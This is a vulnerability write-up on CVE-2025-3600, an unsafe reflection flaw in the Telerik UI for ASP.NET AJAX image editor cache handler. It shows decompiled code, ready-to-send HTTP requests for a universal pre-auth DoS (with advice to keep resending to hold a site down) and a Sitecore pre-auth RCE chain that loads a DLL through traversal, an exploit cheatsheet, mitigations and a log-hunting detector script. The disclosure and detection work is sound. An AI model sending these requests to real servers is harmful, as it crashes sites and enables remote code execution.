Telerik UI for ASP.NET AJAX – Unsafe Reflection via WebResource.axd (type=iec)


Pre‑auth constructor execution in the Telerik UI for ASP.NET AJAX Image Editor cache handler allows a universal DoS and, in many applications, pre‑auth RCE through target-specific gadgets (CVE-2025-3600).

TL;DR

  • Affected component/route: Telerik.Web.UI.WebResource.axd with query type=iec (Image Editor cache handler). Exposed pre‑auth in many products.
  • Primitive: the attacker controls a type name (prtype). The handler resolves it with Type.GetType() and calls Activator.CreateInstance() before enforcing interface type-safety, so the public parameterless constructor (and any static constructor) of any resolvable .NET type runs.
  • Impact:
    • Universal pre‑auth DoS using a .NET framework gadget (PowerShell WSMan finalizer).
    • Frequently escalates to pre‑auth RCE in real deployments using app-specific gadgets, notably insecure AppDomain.AssemblyResolve handlers.
  • Fix: update to Telerik UI for ASP.NET AJAX 2025.1.416+ or remove/restrict the handler.

Affected versions

  • Telerik UI for ASP.NET AJAX 2011.2.712 through 2025.1.218 (inclusive) are vulnerable.
  • Fixed in 2025.1.416 (released 2025-04-30). Patch immediately or remove/restrict the handler.

Attack surface and quick discovery

  • Check exposure:
    • GET /Telerik.Web.UI.WebResource.axd should return something other than 404/403 if the handler is mapped.
    • Look in web.config for handlers mapped to Telerik.Web.UI.WebResource.axd.
    • The vulnerable code path needs: type=iec, dkey=1 and prtype=<attacker-chosen type name>.

Example probe and generic trigger:

http
GET /Telerik.Web.UI.WebResource.axd?type=iec&dkey=1&prtype=Namespace.Type, Assembly

Notes

  • Some PoCs use dtype; the implementation checks dkey=="1" for the download flow.
  • prtype should be assembly-qualified or otherwise resolvable in the current AppDomain.

Root cause – unsafe reflection in ImageEditorCacheHandler

The Image Editor cache download flow instantiates the type named in prtype and only afterwards casts it to ICacheImageProvider and validates the download key. By the time validation fails, the constructor has already executed.

Key flow, extracted after decompilation
csharp
// entrypoint
public void ProcessRequest(HttpContext context)
{
    string text = context.Request["dkey"];                        // dkey
    string text2 = context.Request.Form["encryptedDownloadKey"];  // download key
    ...
    if (this.IsDownloadedFromImageProvider(text)) // effectively dkey == "1"
    {
        ICacheImageProvider imageProvider = this.GetImageProvider(context); // instantiation happens here
        string key = context.Request["key"];
        if (text == "1" && !this.IsValidDownloadKey(text2))
        {
            this.CompleteAsBadRequest(context.ApplicationInstance);
            return; // cast/check happens after ctor has already run
        }
        using (EditableImage editableImage = imageProvider.Retrieve(key))
        {
            this.SendImage(editableImage, context, text, fileName);
        }
    }
}

private ICacheImageProvider GetImageProvider(HttpContext context)
{
    if (!string.IsNullOrEmpty(context.Request["prtype"]))
    {
        return RadImageEditor.InitCacheImageProvider(
            RadImageEditor.GetICacheImageProviderType(context.Request["prtype"]) // [A]
        );
    }
    ...
}

public static Type GetICacheImageProviderType(string imageProviderTypeName)
{
    return Type.GetType(string.IsNullOrEmpty(imageProviderTypeName) ?
        typeof(CacheImageProvider).FullName : imageProviderTypeName); // [B]
}

protected internal static ICacheImageProvider InitCacheImageProvider(Type t)
{
    // unsafe: construct before enforcing interface type-safety
    return (ICacheImageProvider)Activator.CreateInstance(t); // [C]
}

Exploit primitive: controlled type string → Type.GetType resolves it → Activator.CreateInstance runs its public parameterless constructor. Even if the request is rejected afterwards, the gadget's side effects have already happened.

Universal DoS gadget (no app-specific gadgets required)

Class: System.Management.Automation.Remoting.WSManPluginManagedEntryInstanceWrapper in System.Management.Automation (PowerShell) has a finalizer that disposes an uninitialized handle, throwing an unhandled exception when the GC finalizes the object. This reliably crashes the IIS worker process shortly after instantiation.

One‑shot DoS request:

http
GET /Telerik.Web.UI.WebResource.axd?type=iec&dkey=1&prtype=System.Management.Automation.Remoting.WSManPluginManagedEntryInstanceWrapper,+System.Management.Automation,+Version%3d3.0.0.0,+Culture%3dneutral,+PublicKeyToken%3d31bf3856ad364e35

Notes

  • Keep resending at intervals to keep the site down. You can see the constructor being hit in a debugger; the crash happens at finalization.

From DoS to RCE – escalation patterns

Unsafe constructor execution opens up many target-specific gadgets and chains. Look for:

  1. Parameterless constructors that process attacker input
  • Some ctors (or static initializers) read the Request query/body/cookies/headers once and (de)serialize them.
  • Example (Sitecore): a ctor chain reaches GetLayoutDefinition(), which reads the HTTP body "layout" and deserializes JSON via JSON.NET.
  2. Constructors that touch files
  • Ctors that load or deserialize config/blobs from disk can be coerced if you can write to those paths (uploads/temp/data folders).
  3. Constructors performing app-specific ops
  • Resetting state, enabling/disabling modules, or killing processes.
  4. Constructors/static ctors that register AppDomain event handlers
  • Many apps add AppDomain.CurrentDomain.AssemblyResolve handlers that build DLL paths from args.Name without sanitization. If you can influence type resolution you can force arbitrary DLL loads from attacker-controlled paths.
  5. Forcing AssemblyResolve via Type.GetType
  • Request a non-existent type to force CLR resolution and invoke the registered (possibly insecure) resolvers. Example assembly-qualified name:
This.Class.Does.Not.Exist, watchTowr
  6. Finalizers with destructive side effects
  • Some types delete fixed-path files in finalizers. Combined with link following or predictable paths, this can enable local privilege escalation in some environments.

Example pre‑auth RCE chain (Sitecore XP)

  • Step 1 – Pre‑auth: trigger a type whose static/instance ctor registers an insecure AssemblyResolve handler (e.g., Sitecore's FolderControlSource in ControlFactory).
  • Step 2 – Post‑auth: obtain write access to a directory probed by the resolver (e.g., via an auth bypass or a weak upload) and drop a malicious DLL.
  • Step 3 – Pre‑auth: use CVE‑2025‑3600 with a non-existent type and an assembly name containing traversal to force the resolver to load your DLL → code execution as the IIS worker.

Trigger examples

http
# Load the insecure resolver (no auth on many setups)
GET /-/xaml/Sitecore.Shell.Xaml.WebControl

# Coerce the resolver via Telerik unsafe reflection
GET /Telerik.Web.UI.WebResource.axd?type=iec&dkey=1&prtype=watchTowr.poc,+../../../../../../../../../watchTowr

Validation, hunting and DFIR notes

  • Safe lab validation: fire the DoS payload and watch for an app-pool recycle/unhandled exception tied to the WSMan finalizer.
  • Hunt in telemetry:
  • Requests to /Telerik.Web.UI.WebResource.axd with type=iec and odd prtype values.
  • Failed type-load attempts and AppDomain.AssemblyResolve events.
  • Sudden w3wp.exe crashes/recycles following such requests.
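The hunting points above turned into a small detector over IIS W3C logs. Added example, not part of the original page: the log lines are constructed for the demo, the field layout is one I chose, and the "type outside the Telerik.Web.UI namespace" heuristic is my assumption about what a legitimate prtype looks like, not a documented default. Traversal in the assembly part and the WSMan gadget name come straight from the page.

```python
"""Hunt for CVE-2025-3600 (type=iec) abuse in IIS W3C logs.

Added example; sample log is constructed, namespace heuristic is an assumption.
"""
import collections
import urllib.parse

HANDLER = "telerik.web.ui.webresource.axd"
DOS_GADGET = "system.management.automation.remoting.wsmanpluginmanagedentryinstancewrapper"

# Constructed sample log (IIS W3C format; field order chosen for this demo).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2025-05-01 10:00:01 10.0.0.5 GET /Telerik.Web.UI.WebResource.axd type=rca&_TSM_HiddenField_=x 200
2025-05-01 10:00:02 203.0.113.7 GET /Telerik.Web.UI.WebResource.axd type=iec&dkey=1&prtype=System.Management.Automation.Remoting.WSManPluginManagedEntryInstanceWrapper,+System.Management.Automation,+Version%3d3.0.0.0,+Culture%3dneutral,+PublicKeyToken%3d31bf3856ad364e35 400
2025-05-01 10:00:03 203.0.113.7 GET /Telerik.Web.UI.WebResource.axd type=iec&dkey=1&prtype=watchTowr.poc,+../../../../../../../../../watchTowr 500
2025-05-01 10:00:04 203.0.113.7 GET /Telerik.Web.UI.WebResource.axd type=iec&dkey=1&prtype=This.Class.Does.Not.Exist,+watchTowr 500
2025-05-01 10:00:05 10.0.0.9 GET /Telerik.Web.UI.WebResource.axd type=iec&dkey=1&key=abc 200
"""


def parse_w3c(text: str):
    """Yield one dict per request line, keyed by the most recent #Fields: header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields:
            yield dict(zip(fields, line.split()))


def assess(entry: dict) -> list:
    """Return the reasons a request looks like type=iec abuse (empty list if benign)."""
    if not entry.get("cs-uri-stem", "").lower().endswith(HANDLER):
        return []
    qs = urllib.parse.parse_qs(entry.get("cs-uri-query", ""), keep_blank_values=True)
    if qs.get("type", [""])[0].lower() != "iec" or "prtype" not in qs:
        return []
    prtype = qs["prtype"][0]  # parse_qs already decoded '+' and %xx escapes
    reasons = ["attacker-controlled prtype on type=iec"]
    type_name, _, asm = prtype.partition(",")
    if ".." in asm or "/" in asm or "\\" in asm:
        reasons.append("path traversal in assembly name (AssemblyResolve coercion)")
    if type_name.strip().lower() == DOS_GADGET:
        reasons.append("known universal DoS gadget (WSMan finalizer)")
    if not type_name.strip().lower().startswith("telerik.web.ui."):
        # Assumption: legitimate providers live in Telerik.Web.UI; tune per app.
        reasons.append("type outside Telerik.Web.UI namespace")
    return reasons


def hunt(text: str):
    """Return (alerts, per-client counts) for a whole log text."""
    alerts, per_ip = [], collections.Counter()
    for e in parse_w3c(text):
        reasons = assess(e)
        if reasons:
            alerts.append((e["time"], e["c-ip"], e["sc-status"], reasons))
            per_ip[e["c-ip"]] += 1
    return alerts, per_ip


if __name__ == "__main__":
    found, counts = hunt(SAMPLE_LOG)
    for t, ip, st, why in found:
        print(f"{t} {ip} HTTP {st}: " + "; ".join(why))
    for ip, n in counts.most_common():
        print(f"{ip}: {n} suspicious request(s); check w3wp.exe recycles right after this window")
```

Correlate the alert timestamps with application-pool recycle events (Event ID 1000/1026 style crash records and WAS/IIS recycle logs): a type=iec request followed within seconds by a w3wp.exe crash is the DoS gadget, and a traversal-style assembly name followed by a successful request is the resolver chain.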

Mitigations

  • Patch to Telerik UI for ASP.NET AJAX 2025.1.416 or later.
  • Remove or restrict exposure of Telerik.Web.UI.WebResource.axd where possible (WAF/rewrites).
  • Ignore or validate prtype handling server-side (the upgrade performs a proper check before instantiation).
  • Audit and harden custom AppDomain.AssemblyResolve handlers. Avoid building paths from args.Name without sanitization; use strong-named loads or allowlists.
  • Lock down upload/write locations and prevent DLL drops in probed directories.
  • Monitor for attempts to load non-existent types to detect resolver abuse.

Quick cheatsheet

  • Presence check:
  • GET /Telerik.Web.UI.WebResource.axd
  • Check the handler mapping in web.config
  • Exploit skeleton:
http
GET /Telerik.Web.UI.WebResource.axd?type=iec&dkey=1&prtype=<TypeName,+Assembly,+Version=..., +PublicKeyToken=...>
  • Universal DoS:
http
...&prtype=System.Management.Automation.Remoting.WSManPluginManagedEntryInstanceWrapper,+System.Management.Automation,+Version%3d3.0.0.0,+Culture%3dneutral,+PublicKeyToken%3d31bf3856ad364e35
  • Resolver trigger:
This.Class.Does.Not.Exist, watchTowr

Related techniques

  • IIS post-exploitation, .NET key extraction, and in‑memory loaders:

IIS - Internet Information Services

  • ASP.NET ViewState deserialization and machineKey abuse:

Exploiting __VIEWSTATE without knowing the secrets
